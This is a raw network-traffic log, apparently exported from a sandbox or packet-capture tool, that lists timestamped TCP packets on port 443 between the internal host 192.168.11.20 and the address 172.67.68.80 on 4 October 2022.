                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.539685011 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.539721012 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.539726973 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.539774895 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.539868116 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.539900064 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.540051937 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.540052891 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.540060043 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.540162086 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.540169001 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.540342093 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.540350914 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.540450096 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.540563107 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.540669918 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.540683031 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.540810108 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.540860891 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.540889978 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.540896893 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.541024923 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.541086912 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.541141987 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.541161060 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.541342974 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.541354895 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.541457891 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.541464090 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.541521072 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.541637897 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.541692019 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.541697979 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.541810036 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.541894913 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.541902065 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.542025089 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.542032957 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.542131901 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.542375088 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.545892000 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.545901060 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.546039104 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.546066046 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.546154976 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.546161890 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.546263933 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.546269894 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.546431065 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.546437979 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.546479940 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.546485901 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.546606064 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.546808004 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.548949003 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.548968077 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.549093008 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.549118042 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.549170971 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.549180031 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.549288988 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.549298048 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.549396038 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.549401999 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.549561977 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.549644947 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.549653053 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.549710989 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.549717903 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.549845934 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.549853086 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.549938917 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.549972057 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.550052881 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.550059080 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.550103903 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.550282955 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.550285101 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.550291061 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.550292969 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.550379992 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.550477028 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.550483942 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.550620079 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.550626040 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.550685883 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.550719023 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.550849915 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.550858974 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.550864935 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.550952911 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.551016092 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.551023006 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.551141977 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.551148891 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.551290989 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.551312923 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.551320076 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.551493883 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.551665068 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.551772118 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.560655117 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.560671091 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.560834885 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.560908079 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.560918093 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.560956001 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.561069965 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.561141968 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.561232090 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.561238050 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.561321974 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.561328888 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.561420918 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.561428070 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.561546087 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.561553955 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.561662912 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.561669111 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.561806917 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.561887980 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.561894894 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.561959982 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.562000990 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.562138081 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.562158108 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.562175989 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.562206984 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.562257051 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.562263012 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.562355042 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.562382936 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.562391996 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.562530041 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.562536001 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.562544107 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.562627077 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.562633991 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.562705040 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.562824011 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.562830925 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.562913895 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.562920094 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.563112974 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.563237906 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.563245058 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.563364029 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.563822985 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.582550049 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.582565069 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.582741976 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.582751989 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.582813978 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.582909107 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.589262962 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.589274883 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.589421034 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.589533091 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.589543104 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.589549065 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.589607000 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.589627028 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.589634895 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.589716911 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.589725971 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.589797974 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.589930058 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.589931965 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.589986086 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.590059042 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.590280056 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.590289116 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.590356112 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.590363026 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.590707064 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.590713978 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.590718031 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.590929031 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.590935946 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.590995073 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.591355085 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.591495991 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.591506004 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.591634035 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.591777086 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.591825008 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.591878891 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.591886044 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.591939926 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.592039108 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.592111111 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.592122078 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.592174053 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.592263937 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.592271090 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.592381001 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.592387915 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.592542887 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.592632055 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.592638016 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.592992067 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.592998981 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.593100071 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.593240023 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.593336105 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.593346119 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.593388081 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.593394041 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.593480110 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.593486071 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.593703985 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.593713045 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.593838930 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.594217062 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.594225883 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.594296932 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.594695091 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.598655939 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.598666906 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.598733902 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.598843098 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.598860979 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.598869085 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.598915100 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.598922014 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.599045992 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.599194050 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.599302053 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.599431992 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.599442005 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.599545002 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.599553108 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.599607944 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.599622965 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.599754095 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.599806070 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.599813938 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.599895954 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.599903107 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.599946022 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.600017071 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.600219965 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.600228071 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.600346088 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.600481033 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.600487947 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.600598097 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.600815058 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.600825071 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.600893974 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.601092100 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.601099014 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.601182938 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.601191044 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.601507902 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.601516008 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.601624012 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.601758957 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.601768017 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.601926088 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.602092028 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.602098942 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.602173090 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.602379084 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.602385998 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.602468967 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.602474928 CEST44349835172.67.68.80192.168.11.20
